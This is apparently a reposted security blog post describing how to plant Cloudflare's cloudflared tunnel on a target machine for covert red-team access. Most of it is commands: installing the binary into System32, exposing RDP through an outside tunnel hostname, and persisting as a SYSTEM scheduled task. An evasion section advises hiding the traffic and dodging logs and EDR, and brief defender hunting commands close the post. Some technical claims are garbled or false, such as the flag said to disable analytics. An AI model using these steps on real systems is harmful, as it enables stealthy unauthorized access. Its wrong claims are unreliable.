Listen to this Post

Cloudflare Tunnel offers a stealthy way to maintain access in a red team engagement while avoiding traditional C2 infrastructure headaches. By leveraging Cloudflare’s legitimate IPs and services, you can proxy multiple protocols (TCP, UDP, ICMP) through a Wrap Client, enabling RDP, port scanning, and even ping traffic—all while appearing as normal Cloudflare traffic.
You Should Know:
1. Setting Up Cloudflare Tunnel
Install `cloudflared` (Cloudflare’s tunneling daemon) on your target machine:
Linux (Debian/Ubuntu) wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb sudo dpkg -i cloudflared-linux-amd64.deb Windows (PowerShell) Invoke-WebRequest -Uri "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.exe" -OutFile "C:\Windows\System32\cloudflared.exe"
2. Authenticate & Configure Tunnel
cloudflared tunnel login cloudflared tunnel create <TUNNEL_NAME>
Edit the config file (`~/.cloudflared/config.yml`):
tunnel: <TUNNEL_ID> credentials-file: /root/.cloudflared/<TUNNEL_ID>.json ingress: - hostname: your-subdomain.example.com service: tcp://localhost:3389 RDP example - service: http_status:404
3. Proxy Non-HTTP Traffic (TCP/UDP/ICMP)
Use `cloudflared` to forward arbitrary protocols:
Forward RDP (TCP) cloudflared access tcp --hostname rdp.example.com --url tcp://localhost:3389 Forward ICMP (ping) via raw socket proxy (requires additional setup) socat UDP4-LISTEN:53,fork EXEC:"cloudflared access udp --hostname ping.example.com"
4. Run the Tunnel Persistently
Linux (Systemd) sudo cloudflared service install sudo systemctl start cloudflared Windows (Persistence via Scheduled Task) schtasks /create /tn "Cloudflare Tunnel" /tr "C:\Windows\System32\cloudflared.exe tunnel run" /sc onstart /ru SYSTEM
5. Evasion & OPSEC
- Use Cloudflare’s WARP client for full traffic masking.
- Route traffic through legitimate Cloudflare IPs (
dig +short A your-subdomain.example.com). - Avoid logging by disabling Cloudflare analytics:
cloudflared tunnel --no-autoupdate run <TUNNEL_NAME>
What Undercode Say
Cloudflare Tunnel is a game-changer for red teams, blending legitimacy with flexibility. However:
– Detection Risks: Unusual `cloudflared` processes or config files may trigger EDR.
– Logging: Cloudflare retains logs; rotate endpoints frequently.
– Alternative Tools: Consider Ngrok TCP tunnels or Tailscale exit nodes for similar functionality.
For defenders:
Hunt for Cloudflare Tunnels (Linux) ps aux | grep cloudflared lsof -i | grep cloudflared netstat -tulnp | grep cloudflared
Expected Output:
A stealthy, persistent tunnel that bypasses traditional C2 detection while enabling full protocol flexibility.
Prediction
As Cloudflare Tunnel adoption grows, defenders will develop more advanced detection rules, leading to a cat-and-mouse game between red teams and blue teams over legitimate tunneling services.
Relevant URLs:
IT/Security Reporter URL:
Reported By: Harvey Spec – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


